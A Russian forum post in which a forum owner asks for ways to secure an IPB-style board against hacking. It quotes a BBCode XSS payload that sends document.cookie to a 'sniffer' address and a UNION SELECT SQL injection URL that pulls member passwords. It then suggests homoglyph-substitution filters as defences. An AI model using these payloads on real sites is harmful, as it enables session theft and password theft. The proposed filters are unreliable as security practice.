Перейти к контенту
  • 0

Вопрос гуру. Метод защиты форума от взлома.


Вопрос

Поставил тут недавно себе форум 2.(какой то там) .. всё классно.. даже прифигел от возможностей. Но не всё так радужно оакзалось. Почитал о методах взлома форумов.. жуть.. И ведь многие дыры пока ещё "не рассекречены широкой публике" .. На фоне всего этого появилась идея применить координальную защиту от некотрых типов взлома.

 

ну напрмер от взлома через BBcode типа:

[сolor=http://000.aa/=`image.jpg]` style=background:url(javascript:document.images[2].src="снифер?"+document.cookie) [/сolor]

 

Вообщем, технология такая: "просеиваем" данные переданные $_POST и все слова javascript меняем на javasсript (с русской буквой "с"). Т.е. аваскрипт не будет запускаться.. Есть правде негативная сторона - проблема обсуждения вопросов о аваскрипте.. т.е. скопировыанный код скриптов с форума не будет работать.. Но так уж часто у вас на форуме обсуждабтся проблемы в яваскриптах ?

 

Дальше.. проблема SQL инъекции.. SQL инъекции чаще всего имеют вид:

http://masichka.novoross.ru/forum/index.php?act=Members&max_results=30&filter=1&sort_order=asc&sort_key=name&st=%20UNIОN%20SELECT%200,0,password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*

Как видим обязательным элементом инъекции является наличие итмени какой то таблицы форума в запросе..

Идея такая - префикс таблиц делать не ipb_ ,а что нить типа njoFtyu6RN и "просеивать" все данные $_POST и $_GET и во всех словах "njoFtyu6RN" заменять одну букву русской.. и инъекции работать не будут..

 

Вообще хотелось бы больше узнать о методах защиты форумов от хацкеров-хуRцеров. Может кто нить имет своё "ноу-хао"?

Может есть ещё какие нить типы взлома?

Ссылка на комментарий
Поделиться на других сайтах

Рекомендуемые сообщения

Гость
Эта тема закрыта для публикации сообщений.
×
×
  • Создать...

Важная информация

Находясь на нашем сайте, вы соглашаетесь на использование файлов cookie, а также с нашим положением о конфиденциальности Политика конфиденциальности и пользовательским соглашением Условия использования.